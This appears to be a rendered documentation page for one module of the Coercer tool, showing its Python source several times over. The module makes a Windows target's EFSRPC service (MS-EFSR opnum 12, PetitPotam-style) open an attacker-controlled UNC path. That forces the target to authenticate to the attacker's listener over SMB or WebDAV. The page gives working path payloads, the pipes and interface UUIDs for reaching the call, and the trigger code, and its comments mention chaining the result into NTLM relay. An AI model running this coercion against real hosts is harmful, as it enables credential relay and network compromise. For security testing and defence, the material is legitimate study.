coercer.methods.MS_EFSR.EfsRpcFileKeyInfo
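#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : EfsRpcFileKeyInfo.py
# Author             : Podalirius (@podalirius_)
# Date created       : 16 Sep 2022
#
# Coercer method module: makes the target's EFSRPC service open an
# attacker-controlled UNC path through EfsRpcFileKeyInfo (MS-EFSR opnum 12),
# so that the target authenticates to Coercer's listener (PetitPotam-style
# authentication coercion).


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class _EfsRpcFileKeyInfo(NDRCALL):
    """
    Request structure for the RPC call to EfsRpcFileKeyInfo() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    FileName is the only field this method cares about: it carries the UNC
    path pointing at the listener. InfoClass is always sent as 0 by trigger()
    and the reply is never inspected.
    """
    opnum = 12
    structure = (
        ('FileName', WSTR),   # Type: wchar_t * — UNC path the server is made to open
        ('InfoClass', DWORD)  # Type: DWORD — set to 0 by trigger(); value not relied upon
    )


class _EfsRpcFileKeyInfoResponse(NDRCALL):
    """
    Response structure for the RPC call to EfsRpcFileKeyInfo() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Deliberately empty: trigger() discards the reply, so the real layout is
    not modelled. NOTE(review): keep the "<request class>Response" name —
    impacket's DCERPC.request() presumably resolves the response class by
    that naming convention; confirm before renaming.
    """
    structure = ()


class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcFileKeyInfo (opnum 12) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)

    How it works: FileName is filled with a UNC path built from one of
    `exploit_paths` (rendered by the framework, {{listener}} being Coercer's
    listener); when the target's EFSRPC service tries to open it, the target
    authenticates to that listener over SMB or HTTP/WebDAV.

    NOTE(review): coerced authentication of this kind is commonly chained into
    NTLM relay. On the defensive side, RPC filters on the two interface UUIDs
    listed in `access`, plus SMB/LDAP signing and EPA, are the usual
    mitigations — check current vendor guidance rather than relying on this
    comment.
    """

    # Each entry is (listener_kind, path_template). Templates are expanded by
    # the framework; the explicit trailing "\x00" terminates the wchar_t string
    # (presumably required by the WSTR marshalling — confirm against
    # MSPROTOCOLRPCCALL before removing it).
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports and interface bindings the framework may use to reach opnum 12.
    # NOTE(review): the key is spelled "ncan_np" (not the canonical "ncacn_np");
    # presumably this is the spelling the rest of Coercer looks up, so it must
    # not be "corrected" in this file alone.
    access = {
        "ncan_np": [
            # Dedicated EFSRPC pipe / interface.
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            # Same interface UUID reachable through four other pipes
            # (presumably aliases of one LSA-hosted endpoint — confirm).
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        # Direct TCP bindings to the same two interfaces (no named pipe).
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    function = {
        "name": "EfsRpcFileKeyInfo",
        "opnum": 12,
        "vulnerable_arguments": ["FileName"]  # the argument that carries the UNC path
    }

    def trigger(self, dcerpc_session, target):
        """
        Send a single EfsRpcFileKeyInfo request with FileName set to self.path.

        Args:
            dcerpc_session: connected impacket DCE/RPC session, bound to one of
                the interfaces in `access`; None if connect() was never called.
            target: unused by this method; kept so every method shares the
                same trigger() signature (presumably required by the framework).

        Returns:
            "" if the request round-trip completed without an exception,
            the exception object if the call raised (a DCERPCSessionError is
            one expected outcome — callers presumably inspect its type),
            or None when no session was supplied.

        A "" result only means the RPC call did not raise; whether the target
        actually authenticated must be confirmed on the listener side.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcFileKeyInfo()
            request['FileName'] = self.path
            request['InfoClass'] = 0  # as in the original PoC; the reply is ignored
            dcerpc_session.request(request)
        except Exception as err:
            # Any failure is handed back to the caller rather than raised, so
            # the framework can classify it (e.g. DCERPCSessionError).
            return err
        return ""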
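class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcFileKeyInfo (opnum 12) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)

    How it works: FileName is filled with a UNC path built from one of
    `exploit_paths` (rendered by the framework, {{listener}} being Coercer's
    listener); when the target's EFSRPC service tries to open it, the target
    authenticates to that listener over SMB or HTTP/WebDAV.

    NOTE(review): coerced authentication of this kind is commonly chained into
    NTLM relay. On the defensive side, RPC filters on the two interface UUIDs
    listed in `access`, plus SMB/LDAP signing and EPA, are the usual
    mitigations — check current vendor guidance rather than relying on this
    comment.
    """

    # Each entry is (listener_kind, path_template). Templates are expanded by
    # the framework; the explicit trailing "\x00" terminates the wchar_t string
    # (presumably required by the WSTR marshalling — confirm against
    # MSPROTOCOLRPCCALL before removing it).
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports and interface bindings the framework may use to reach opnum 12.
    # NOTE(review): the key is spelled "ncan_np" (not the canonical "ncacn_np");
    # presumably this is the spelling the rest of Coercer looks up, so it must
    # not be "corrected" in this file alone.
    access = {
        "ncan_np": [
            # Dedicated EFSRPC pipe / interface.
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            # Same interface UUID reachable through four other pipes
            # (presumably aliases of one LSA-hosted endpoint — confirm).
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        # Direct TCP bindings to the same two interfaces (no named pipe).
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    function = {
        "name": "EfsRpcFileKeyInfo",
        "opnum": 12,
        "vulnerable_arguments": ["FileName"]  # the argument that carries the UNC path
    }

    def trigger(self, dcerpc_session, target):
        """
        Send a single EfsRpcFileKeyInfo request with FileName set to self.path.

        Args:
            dcerpc_session: connected impacket DCE/RPC session, bound to one of
                the interfaces in `access`; None if connect() was never called.
            target: unused by this method; kept so every method shares the
                same trigger() signature (presumably required by the framework).

        Returns:
            "" if the request round-trip completed without an exception,
            the exception object if the call raised (a DCERPCSessionError is
            one expected outcome — callers presumably inspect its type),
            or None when no session was supplied.

        A "" result only means the RPC call did not raise; whether the target
        actually authenticated must be confirmed on the listener side.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcFileKeyInfo()
            request['FileName'] = self.path
            request['InfoClass'] = 0  # as in the original PoC; the reply is ignored
            dcerpc_session.request(request)
        except Exception as err:
            # Any failure is handed back to the caller rather than raised, so
            # the framework can classify it (e.g. DCERPCSessionError).
            return err
        return ""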
Coercing a machine to authenticate using function EfsRpcFileKeyInfo (opnum 12) of the MS-EFSR (Encrypting File System Remote) protocol
Method found by: @topotam77
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
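def trigger(self, dcerpc_session, target):
    """
    Send a single EfsRpcFileKeyInfo request with FileName set to self.path.

    Args:
        dcerpc_session: connected impacket DCE/RPC session, bound to one of
            the interfaces in `access`; None if connect() was never called.
        target: unused by this method; kept so every method shares the
            same trigger() signature (presumably required by the framework).

    Returns:
        "" if the request round-trip completed without an exception,
        the exception object if the call raised (a DCERPCSessionError is
        one expected outcome — callers presumably inspect its type),
        or None when no session was supplied.

    A "" result only means the RPC call did not raise; whether the target
    actually authenticated must be confirmed on the listener side.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        request = _EfsRpcFileKeyInfo()
        request['FileName'] = self.path
        request['InfoClass'] = 0  # as in the original PoC; the reply is ignored
        dcerpc_session.request(request)
    except Exception as err:
        # Any failure is handed back to the caller rather than raised, so
        # the framework can classify it (e.g. DCERPCSessionError).
        return err
    return ""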